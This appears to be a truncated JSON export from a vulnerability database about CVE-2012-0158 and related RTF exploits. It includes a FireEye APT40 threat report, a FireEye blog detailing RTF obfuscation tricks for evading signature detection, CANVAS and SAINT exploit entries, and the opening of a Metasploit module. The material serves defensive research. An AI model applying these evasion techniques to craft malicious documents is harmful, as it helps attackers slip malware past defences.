Initiative. China\u2019s \u201cOne Belt, One Road\u201d (\u4e00\u5e26\u4e00\u8def) or \u201cBelt and Road Initiative\u201d (BRI) is a $1 trillion USD endeavor to build land and maritime trade routes across Asia, Europe, the Middle East, and Africa to develop a trade network that will project China\u2019s influence across the greater region.\n\n \nFigure 1: Countries and industries targeted. Countries include the United States, United Kingdom, Norway, Germany, Saudi Arabia, Cambodia and Indonesia\n\n#### Attribution\n\nWe assess with moderate confidence that APT40 is a state-sponsored Chinese cyber espionage operation. The actor\u2019s targeting is consistent with Chinese state interests and there are multiple technical artifacts indicating the actor is based in China. Analysis of the operational times of the group\u2019s activities indicates that it is probably centered around China Standard Time (UTC +8). In addition, multiple APT40 command and control (C2) domains were initially registered by China based domain resellers and had Whois records with Chinese location information, suggesting a China based infrastructure procurement process.\n\nAPT40 has also used multiple Internet Protocol (IP) addresses located in China to conduct its operations. In one instance, a log file recovered from an [open indexed server](<https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html>) revealed that an IP address (112.66.188.28) located in Hainan, China had been used to administer the command and control node that was communicating with malware on victim machines. All of the logins to this C2 were from computers configured with Chinese language settings.\n\n#### Attack Lifecycle\n\n_Initial Compromise_\n\nAPT40 has been observed leveraging a variety of techniques for initial compromise, including web server exploitation, phishing campaigns delivering publicly available and custom backdoors, and strategic web compromises.\n\n * APT40 relies heavily on web shells for an initial foothold into an organization. Depending on placement, a web shell can provide continued access to victims' environments, re-infect victim systems, and facilitate lateral movement.\n * The operation\u2019s spear-phishing emails typically leverage malicious attachments, although Google Drive links have also been observed.\n * APT40 leverages exploits in their phishing operations, often weaponizing vulnerabilities within days of their disclosure. Observed vulnerabilities include:\n * [CVE-2012-0158](<https://intelligence.fireeye.com/reports/12-19517>)\n * [CVE-2017-0199](<https://intelligence.fireeye.com/reports/17-00003493>)\n * [CVE-2017-8759](<https://intelligence.fireeye.com/reports/17-00010114>)\n * [CVE-2017-11882](<https://intelligence.fireeye.com/reports/17-00012724>)\n\n \nFigure 2: APT40 attack lifecycle\n\n_Establish Foothold_\n\nAPT40 uses a variety of malware and tools to establish a foothold, many of which are either publicly available or used by other threat groups. In some cases, the group has used executables with code signing certificates to avoid detection.\n\n * First-stage backdoors such as AIRBREAK, FRESHAIR, and BEACON are used before downloading other payloads.\n * PHOTO, BADFLICK, and CHINA CHOPPER are among the most frequently observed backdoors used by APT40.\n * APT40 will often target VPN and remote desktop credentials to establish a foothold in a targeted environment. This methodology proves to be ideal as once these credentials are obtained, they may not need to rely as heavily on malware to continue the mission.\n\n_Escalate Privileges_\n\nAPT40 uses a mix of custom and publicly available credential harvesting tools to escalate privileges and dump password hashes.\n\n * APT40 leverages custom credential theft utilities such as HOMEFRY, a password dumper/cracker used alongside the AIRBREAK and BADFLICK backdoors.\n * Additionally, the Windows Sysinternals ProcDump utility and Windows Credential Editor (WCE) are believed to be used during intrusions as well.\n\n_Internal Reconnaissance_\n\nAPT40 uses compromised credentials to log on to other connected systems and conduct reconnaissance. The group also leverages RDP, SSH, legitimate software within the victim environment, an array of native Windows capabilities, publicly available tools, as well as custom scripts to facilitate internal reconnaissance.\n\n * APT40 used MURKYSHELL at a compromised victim organization to port scan IP addresses and conduct network enumeration.\n * APT40 frequently uses native Windows commands, such as net.exe, to conduct internal reconnaissance of a victim\u2019s environment.\n * Web shells are heavily relied on for nearly all stages of the attack lifecycle. Internal web servers are often not configured with the same security controls as public-facing counterparts, making them more vulnerable to exploitation by APT40 and similarly sophisticated groups.\n\n_Lateral Movement_\n\nAPT40 uses many methods for lateral movement throughout an environment, including custom scripts, web shells, a variety of tunnelers, as well as Remote Desktop Protocol (RDP). For each new system compromised, the group usually executes malware, performs additional reconnaissance, and steals data.\n\n * APT40 also uses native Windows utilities such as at.exe (a task scheduler) and net.exe (a network resources management tool) for lateral movement.\n * Publicly available tunneling tools are leveraged alongside distinct malware unique to the operation.\n * Although MURKYTOP is primarily a command-line reconnaissance tool, it can also be used for lateral movement.\n * APT40 also uses publicly available brute-forcing tools and a custom utility called DISHCLOTH to attack different protocols and services.\n\n_Maintain Presence_\n\nAPT40 primarily uses backdoors, including web shells, to maintain presence within a victim environment. These tools enable continued control of key systems in the targeted network.\n\n * APT40 strongly favors web shells for maintaining presence, especially publicly available tools.\n * Tools used during the Establish Foothold phase also continue to be used in the Maintain Presence phase; this includes AIRBREAK and PHOTO.\n * Some APT40 malware tools can evade typical network detectiona by leveraging legitimate websites, such as GitHub, Google, and Pastebin for initial C2 communications.\n * Common TCP ports 80 and 443 are used to blend in with routine network traffic.\n\n_Complete Mission_\n\nCompleting missions typically involves gathering and transferring information out of the target network, which may involve moving files through multiple systems before reaching the destination. APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration. We have also observed APT40 develop tools such as PAPERPUSH to aid in the effectiveness of their data targeting and theft.\n\n#### Outlook and Implications\n\nDespite increased public attention, APT40 continues to conduct cyber espionage operations following a regular tempo, and we anticipate their operations will continue through at least the near and medium term. Based on APT40\u2019s broadening into election-related targets in 2017, we assess with moderate confidence that the group\u2019s future targeting will affect additional sectors beyond maritime, driven by events such as China\u2019s Belt and Road Initiative. In particular, as individual Belt and Road projects unfold, we are likely to see continued activity by APT40 which extends against the project\u2019s regional opponents.\n", "edition": 2, "cvss3": {}, "published": "2019-03-04T13:00:00", "type": "fireeye", "title": "APT40: Examining a China-Nexus Espionage Actor", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2017-0199", "CVE-2017-11882", "CVE-2017-8759"], "modified": "2019-03-04T13:00:00", "id": "FIREEYE:8DF2C812CF325AAB2F348273A03789F5", "href": "https://www.fireeye.com/blog/threat-research/2019/03/apt40-examining-a-china-nexus-espionage-actor.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-03-07T16:24:18", "description": "#### **History**\n\nRich Text Format (RTF) is a document format developed by Microsoft that has been widely used on various platforms for more than 29 years. The RTF format is very flexible and therefore complicated. This makes the development of a safe RTF parsers challenging. Some notorious vulnerabilities such as [CVE-2010-3333](<http://www.microsoft.com/technet/security/Bulletin/MS10-087.mspx>) and [CVE-2014-1761](<https://blogs.mcafee.com/mcafee-labs/close-look-rtf-zero-day-attack-cve-2014-1761-shows-sophistication-attackers/>) were caused by errors in implementing RTF parsing logic.\n\nIn fact, RTF malware is not limited to exploiting RTF parsing vulnerabilities. Malicious RTF files can include other vulnerabilities unrelated to the RTF parser because RTF supports the embedding of objects, such as OLE objects and images. [CVE-2012-0158](<https://technet.microsoft.com/en-us/library/security/ms12-027.aspx>) and [CVE-2015-1641](<https://blog.fortinet.com/post/the-curious-case-of-the-document-exploiting-an-unknown-vulnerability-part-1>) are two typical examples of such vulnerabilities \u2013 their root cause does not reside in the RTF parser and attackers can exploit these vulnerabilities through other file formats such as DOC and DOCX.\n\nAnother type of RTF malware does not use any vulnerabilities. It simply contains embedded malicious executable files and tricks the user into launching those malicious files. This allows attackers to distribute malware via email, which is generally not a vector for sending executable files directly.\n\nPlenty of malware authors prefer to use RTF as an attack vector because RTF is an obfuscation-friendly format. As such, their malware can easily evade static signature based detection such as YARA or Snort. This is a big reason why, in this scriptable exploit era, we still see such large volumes of RTF-based attacks.\n\nIn this blog, we present some common evasive tricks used by malicious RTFs. \n\n#### **Common obfuscations**\n\nLet\u2019s discuss a couple different RTF obfuscation strategies.\n\n**1\\. CVE-2010-3333**\n\nThis vulnerability, reported by Team509 in 2009, is a typical stack overflow bug. Exploitation of this vulnerability is so easy and reliable that it is still used in the wild, seven years after its discovery! Recently, attackers exploiting this vulnerability [targeted an Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>).\n\nThe root cause of this vulnerability was that the Microsoft RTF parser has a stack-based buffer overflow in the procedure parsing the pFragments shape property. Crafting a malicious RTF to exploit this vulnerability allows attackers to execute arbitrary code. Microsoft has since addressed the vulnerability, but many old versions of Microsoft Office were affected, so its threat rate was very high.\n\n\n\n\n\nThe Microsoft Office RTF parser lacks proper bounds checking when copying source data to a limited stack-based buffer. The pattern of this exploit can be simplified as follows:\n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv A;B;[word1][word2][word3][hex value array]}}}} \n \n--- \n \nBecause pFragments is rarely seen in normal RTF files, many firms would simply detect this keyword and the oversized number right after \\sv in order to catch the exploit using YARA or Snort rules. This method works for samples that are not obfuscated, including samples generated by Metasploit. However, against in-the-wild samples, such signature-based detection is insufficient. For instance, [the malicious RTF targeting the Ambassador of India](<http://researchcenter.paloaltonetworks.com/2016/02/new-malware-rover-targets-indian-ambassador-to-afghanistan/>) is a good sample to illustrate the downside of the signature based detection. Figure 1 shows this RTF document in a hex editor. We simplified Figure 1 because of the space limitations \u2013 there were plenty of dummy symbols such as { } in the initial sample.\n\n\n\nFigure 1. Obfuscated sample of CVE-2010-3333\n\nAs we can see, the pFragments keyword has been split into many pieces that would bypass most signature based detection. For instance, most anti-virus products failed to detect this sample on first submission to VirusTotal. In fact, not only will the split pieces of \\sn be combined together, pieces of \\sv will be combined as well. The following example demonstrates this obfuscation:\n\nObfuscated\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn2 pF}{\\sn44 ragments}{\\sv 1;28}{\\sv ;fffffffffffff\u2026.}}}} \n \n---|--- \n \nClear\n\n| \n\n{\\rtf1{\\shp{\\sp{\\sn pFragments}{\\sv 1;28 ;fffffffffffff\u2026.}}}} \n \nWe can come up with a variety of ideas different from the aforementioned sample to defeat static signature based detection.\n\nNotice the mixed \u2018\\x0D\u2019 and \u2018\\x0A\u2019 \u2013 they are \u2018\\r\u2019 and \u2018\\n\u2019 and the RTF parser would simply ignore them.\n\n**2\\. Embedded objects**\n\nUsers can embed variety of objects into RTF, such as OLE (Object Linking and Embedding) control objects. This makes it possible for OLE related vulnerabilities such as CVE-2012-0158 and CVE-2015-1641 to be accommodated in RTF files. In addition to exploits, it is not uncommon to see executable files such as PE, CPL, VBS and JS embedded in RTF files. These files require some form of social engineering to trick users into launching the embedded objects. We have even seen some Data Loss Prevention (DLP) solutions embedding PE files inside RTF documents. It\u2019s a bad practice because it cultivates poor habits in users.\n\nLet\u2019s take a glance at [the embedded object syntax first](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n\n\n<objtype> specifies the type of object. \\objocx is the most common type used in malicious RTFs for embedding OLE control objects; as such, let\u2019s take it as an example. The data right after \\objdata is OLE1 native data, [defined as](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>):\n\n<data>\n\n| \n\n(\\binN #BDATA) | #SDATA \n \n---|--- \n \n#BDATA\n\n| \n\nBinary data \n \n#SDATA\n\n| \n\nHexadecimal data \n \nAttackers would try to insert various elements into the <data> to evade static signature detection. Let\u2019s take a look at some examples to understand these tricks:\n\na. For example, \\binN can be swapped with #SDATA. The data right after \\binN is raw binary data. In the following example, the numbers 123 will be treated as binary data and hence translated into hex values 313233 in memory.\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin3 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nLet\u2019s look at another example:\n\nObfuscated\n\n| \n\n\uff5b\\object\\objocx\\objdata \\bin41541544011100001100000000000000000000000000000000000000000003 123\uff5d \n \n---|--- \n \nClear\n\n| \n\n\uff5b\\object\\objocx\\objdata 313233\uff5d \n \nIf we try to call atoi or atol with the numeric parameter string marked in red in the table above, we will get 0x7fffffff while its true value should be 3.\n\nThis happens because [\\bin takes a 32-bit signed integer numeric parameter](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>). You would think that the RTF parser calls atoi or atol to convert the numeric string to an integer; however, that\u2019s is not the case. Microsoft Word\u2019s RTF parser does not use these standard C runtime functions. Instead, the atoi function in Microsoft Word\u2019s RTF parser is implemented as follows:\n\n\n\nb. \\ucN and \\uN \nBoth of them are ignored, and the characters right after \\uN would not be skipped.\n\nc. The space characters: 0x0D (\\n), 0x0A (\\r), 0x09 (\\t) are ignored.\n\nd. Escaped characters \nRTF has some special symbols that are reserved. For normal use, users will need to escape these symbols. Here's an incomplete list:\n\n\\\\} \n\\\\{ \n\\% \n\\\\+ \n\\\\- \n\\\\\\ \n\\'hh\n\nAll of those escaped characters are ignored, but there\u2019s an interesting situation with \\\u2019hh. Let\u2019s look into an example first:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 341\\\u2019112345 } \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 342345} \n \nWhen parsing \\\u201911, the parser will treat the 11 as an encoded hex byte. This hex byte is then discarded before it continues parsing the rest of objdata. The 1 preceding \\\u201911 has also been discarded. Once the RTF parser parses the 1 right before \\\u201911, which is the higher 4-bit of an octet, and then immediately encounters \\\u201911, the higher 4-bit would be discarded. That\u2019s because the internal state for decoding the hex string to binary bytes has been reset.\n\nThe table below shows the processing procedure, the two 1s in the yellow rows are from \\\u201911. It\u2019s clear that the mixed \\\u201911 disorders the state variable, which causes the higher 4-bit of the second byte to be discarded:\n\n\n\ne. Oversized control word and numeric parameter \nThe [RTF specification](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>) says that a control word\u2019s name cannot be longer than 32 letters and the numeric parameter associated with the control word must be a signed 16-bit integer or signed 32-bit integer, but the RTF parser of Microsoft Office doesn\u2019t strictly obey the specification. Its implementation only reserves a buffer of size 0xFF for storing the control word string and the numeric parameter string, both of which are null-terminated. All characters after the maximum buffer length (0xFF) will not remain as part of the control word or parameter string. Instead, the control word or parameter will be terminated.\n\n\n\nIn the first obfuscated example, the length of the over-sized control word is 0xFE. By adding a null-terminator, the control word string will reach the maximum length of 0xFF, then the remaining data belongs to objdata.\n\nFor the second obfuscated example, the total length of the \u201cbin\u201d control word and its parameter is 0xFD. By adding their null-terminator, the length equals 0xFF.\n\nf. Additional techniques\n\nThe program uses the last \\objdata control word in a list, as shown here:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 554564{\\\\*\\objdata 4444}54545} OR\n\n{\\object\\objocx\\objdata 554445\\objdata 444454545}\n\n{\\object\\objocx{{\\objdata 554445}{\\objdata 444454545}}} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444454545} \n \nAs we can see here, except for \\binN, other control words are ignored:\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\par2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444{\\datastore2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\datastore2211 55556666} OR\n\n{\\object\\objocx\\objdata 44444444{\\unknown2211 5555}6666} OR\n\n{\\object\\objocx\\objdata 44444444\\unknown2211 55556666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \nThere is another special case that makes the situation a bit more complicated. That is control symbol \\\\*. From RTF specification, we can get the description for [this control symbol:](<https://www.microsoft.com/en-sg/download/details.aspx?id=10725>)\n\n_Destinations added after the 1987 RTF Specification may be preceded by the control symbol **\\\\*** (backslash asterisk). This control symbol identifies destinations whose related text should be ignored if the RTF reader does not recognize the destination control word._\n\nLet\u2019s take a look at how it can be used in obfuscations:\n\n1\\. \n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\par314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 4444444455556666} \n \n\\par is a known control word that does not accept any data. RTF parser will skip the control word and only the data that follows remains.\n\n2.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\datastore314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nRTF parser can also recognize \\datastore and understand that it can accept data, therefore the following data will be consumed by \\datastore.\n\n3.\n\nObfuscated\n\n| \n\n{\\object\\objocx\\objdata 44444444{\\\\*\\unknown314 5555}6666} \n \n---|--- \n \nClear\n\n| \n\n{\\object\\objocx\\objdata 444444446666} \n \nFor an analyst, it\u2019s difficult to manually extract embedded objects from an obfuscated RTF, and no public tool can handle obfuscated RTF. However, winword.exe uses the OleConvertOLESTREAMToIStorage function to convert OLE1 native data to OLE2 structured storage object. Here\u2019s the prototype of OleConvertOLESTREAMToIStorage:\n\n\n\nThe object pointed by lpolestream contains a pointer to OLE1 native binary data. We can set a breakpoint at OleConvertOLESTREAMToIStorage and dump out the object data which has been de-obfuscated by the RTF Parser:\n\n\n\nThe last command .writemem writes a section of memory to d:\\evil_objdata.bin. You can specify other paths as you want; 0e170020 is the start address of the memory range, and 831b6 is the size.\n\nMost of the obfuscation techniques of \\objdata can also apply to embedded images, but for images, it seems there is no obvious technique as OleConvertOLESTREAMToIStorage. To extract an obfuscated picture, locate the RTF parsing code quickly using data breakpoint and that will reveal the best point to dump the whole data.\n\n#### **Conclusion**\n\nOur adversaries are sophisticated and familiar with the RTF format and the inner workings of Microsoft Word. They have managed to devise these obfuscation tricks to evade traditional signature-based detection. Understanding how our adversary is performing obfuscation can in turn help us improve our detection of such malware.\n\n#### **Acknowledgements**\n\nThanks to Yinhong Chang, Jonell Baltazar and Daniel Regalado for their contributions to this blog.\n", "edition": 2, "cvss3": {}, "published": "2016-05-20T14:59:00", "type": "fireeye", "title": "How RTF malware evades static signature-based detection", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158", "CVE-2010-3333", "CVE-2014-1761", "CVE-2015-1641"], "modified": "2016-05-20T14:59:00", "id": "FIREEYE:38120E3D3979DCD57297419690545DDD", "href": "https://www.fireeye.com/blog/threat-research/2016/05/how_rtf_malware_evad.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2021-07-28T14:33:12", "edition": 3, "description": "**Name**| ms12_027 \n---|--- \n**CVE**| CVE-2012-0158 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| MS12-027 MSCOMCTL.OCX ActiveX Buffer Overflow \n**Notes**| CVE Name: CVE-2012-0158 \nVENDOR: Microsoft \nNotes: \n \nYou shoud manually start a Universal listener for this exploit. \nThe listener IP and PORT should be declared in the module configuration \ndialog. \n \nTested on: \n* Windows XP Professional SP3 English with Office 2010 Standard \n* Windows 7 English. \n \nThe Universal Windows version needs the target to have Word opened \nfor a few seconds before executing the file. \n \nUsage: \nGenerate rtf file and send to target. \n \n \nVersionsAffected: Office 2003 to Office 2010 SP1 \nRepeatability: \nMSADV: MS12-027 \nReferences: http://technet.microsoft.com/en-us/security/bulletin/ms12-027 \nCVE Url: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0158 \nDate public: 04/10/2012 \nCVSS: 9.3 \n\n", "cvss3": {}, "published": "2012-04-10T21:55:00", "type": "canvas", "title": "Immunity Canvas: MS12_027", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2012-04-10T21:55:00", "id": "MS12_027", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/ms12_027", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "saint": [{"lastseen": "2022-01-26T11:36:03", "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: [52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-04-12T00:00:00", "type": "saint", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2012-04-12T00:00:00", "id": "SAINT:2837E3FFCA88074AEA3D7A814D67BEC2", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:58", "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: [52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-04-12T00:00:00", "type": "saint", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2012-04-12T00:00:00", "id": "SAINT:FA42FF32EDF77D4600EA8685EBDE9D45", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-28T14:33:23", "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: [52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-04-12T00:00:00", "type": "saint", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2012-04-12T00:00:00", "id": "SAINT:D79A7CB8B12034409DA174D1F0EC34F3", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-29T16:40:29", "description": "Added: 04/12/2012 \nCVE: [CVE-2012-0158](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0158>) \nBID: [52911](<http://www.securityfocus.com/bid/52911>) \nOSVDB: [81125](<http://www.osvdb.org/81125>) \n\n\n### Background\n\nMicrosoft Windows bundles various common ActiveX controls in the Common Controls library `**MSCOMCTL.OCX**`. Several Windows applications use these controls. \n\n### Problem\n\nVarious ActiveX controls in `**MSCOMCTL.OCX**` in the Common Controls in Microsoft Office 2007 and Office 2010 allow remote attackers to execute arbitrary code via a crafted `**.rtf**` file that triggers system state corruption. \n\n### Resolution\n\nApply the update referenced in [MS12-027](<http://technet.microsoft.com/en-us/security/bulletin/ms12-027>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/ms12-027> \n<http://www.net-security.org/secworld.php?id=12732> \n\n\n### Limitations\n\nThis exploit has been tested on Microsoft Word 2007 SP3 and Microsoft Word 2010 SP1 running on Windows XP SP3 English (DEP OptIn) and Windows 7 SP1 (DEP OptIn). \n\nThe user must open the exploit file in Microsoft Word on the target system. \n\n### Platforms\n\nWindows \n \n\n", "cvss3": {}, "published": "2012-04-12T00:00:00", "type": "saint", "title": "Microsoft Windows Common Controls MSCOMCTL.OCX Vulnerability", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0158"], "modified": "2012-04-12T00:00:00", "id": "SAINT:691FBFDFE24704CB1E9FB73F0186260A", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_common_controls_mscomctlocx", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:18:53", "description": "", "cvss3": {}, "published": "2012-04-25T00:00:00", "type": "packetstorm", "title": "MS12-027 MSCOMCTL ActiveX Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2012-04-25T00:00:00", "id": "PACKETSTORM:112176", "href": "https://packetstormsecurity.com/files/112176/MS12-027-MSCOMCTL-ActiveX-Buffer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n 